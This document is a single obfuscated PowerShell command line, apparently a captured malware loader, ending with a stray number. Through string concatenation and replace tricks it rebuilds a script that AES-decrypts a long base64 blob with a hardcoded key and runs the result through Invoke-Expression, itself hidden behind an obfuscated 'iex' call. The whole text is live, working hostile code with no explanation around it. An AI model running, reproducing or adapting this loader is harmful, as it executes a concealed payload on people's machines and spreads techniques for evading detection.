powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI80168368095155879246343180283860CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIG0A1+PrFFIeELomZdViz8ihpJlgfWSG+c8Fn24Yl9hVuxVdEAurMWPyojwYOyeb5UMR2oDYO7mDj/4mQVoDcRIADMQ1J1PJY9WxnIjECC7W9LI8Ol3HTjOpzG4waT56lIqmYk4zL1SBvoe848dm6BtzEqKQqLTN6fMMNKOQsy6SVkJBW1zdvJWXNlxNUH7AptKMypi2N4ui1CpNo9Is/Ppayo7+f+db5c0GzQPZxJIw/3OToEEIMAI5IJSOIGhsVJA4DgZO7nCHnqIBscBMRiN/wglDM6tX6Q46URemN1y1W49YuzsDpjsfyxzQ+zi1I4eB1IETOHTz89D8BlxuQDwVClBv0+GDF59fznQ+YF6okM+C5BLM7qkIfbMFKc4O35deBE51BwEhPDvsmK2YSQir1FqWmjz3acFG6znZLgkf/HIuzamqoNgAIZMeZkT0RAYkvTUz8ZlkOo3MXnJyx5+xJM2zkiMd7oajc1lJOMPl/ux94t3CqSJ4gPzg/TnWyOxZ7404PZ7piPpZHD3egMhNexxTnGS0OPblGvzwwR1cJqSmB8NqH1qiVMb6ZM9uUvWRwa9ChaqcWgS7YCenzvazlGFz18pnnY+NxUA5N33oDEe5RsGMSlntzzIdIjahx4MBp9RqCAgsjd9w3j6p8WdkME0ydEckZWZRTSRQF2N3iyEvHCGec2vUNtxttJgAauSuuMSTUGFzS9NxkWehSSMzdhRforbZwrvjEAtnHqqKf4FTgfXWgXRtnMDJly+CiPXeTZMHxQk2JjMi6Oj18ZqF6a42R6Xhj38hbydvJ/x+52suO/yRpRTLRHRNF8vICiawEBQZ4dt1wNfhVVuvL5NRf6NZ1ClnjfRoRLMD4obqKHFVHUQC4sC5Nuh2ZMLm7nwamr4ZBvmTROLz45tV+1cflORgGrvz66LRqzMoYdb17qGKi1sZfebxHGBQpbifqSh8xBz1xGWWuV4a1PCcQ2DIukdCbTpb2qCvsJDt7Z46dOGEv8na9tYmcl2ku8AIY2gC73T4DojNl4vsUG8T6JxrMWAfXHCngUXiBDPsyW/R0hFAHtBsHYMzlcJ9Lycu1/CiwFS+ogiZL7iRJusUsqFfcL49eQfmrOccCnod07s83tBs1cm8mZxX+xFnMrPw/6tsTt137aHBnYOMs1jZPOvzn1Agv8jseg6ApWoP8e8UPbxJdj3r+8MeT2VkMKer32XVvbumEwPcbODr1COI3yYiAMiPRT+mmYnkKBPtjSynWD6zs6DIcdvUTbsZN7iyksLS0vSlwKXzbWQqOS5dzEhmD4NunfG7hAWTRQvQF8JafWNW/YTa25A1rw0bRhYAA1lcUGdqfJtbq7/md4Gk+/FVjWrbZRHgyzxLo2rkul1p2/Aa1TnMDxt5INkg2AiYq72RE0sOxd4e9FzmvIC/SBl/hqvj2SijxxjWc57usBZ0pZ74PyUGvT04mhWqJajRBXpkHXRPz59/o4IPdsnm3WKtCZPkB1JpKLLGvfv7f9VHie8EbskOc1bmVRCGaoesp3hDo4JpJL5DyJ49vYmkUy6sdO4ngGmWu8U14AwjDKqJlD8lVCJCwwIRQS/t5nrg6l3h0hWT/EYl0jzzOLCdYBDjL5O9yEamn1BSFnvvZ0prNrFvh7SdTJIBl5vLT87bDzCew9Zvvw+7BXhqUntDDsQGIwOMa2IE+WGKzUkPUtLBd7qDCgW7qFrJhGiveqc6JJcV0v+8vS1iNL1aD5Xe5GSfpJGNcvvIz4VEKBPvHmdroV2Hwz16mXQl4YLVImR2awDbst0XBSrmtiSpEUtY4KkGHu7NQGhygAZksH+7tLvMkeYh1xUFdAcErWiA6l+3gCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
2204